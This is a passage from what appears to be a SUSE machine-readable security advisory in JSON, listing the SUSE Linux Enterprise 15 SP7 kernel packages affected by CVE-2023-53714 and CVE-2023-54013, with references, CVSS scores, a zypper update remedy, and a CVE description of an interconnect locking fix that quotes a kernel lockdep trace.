"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
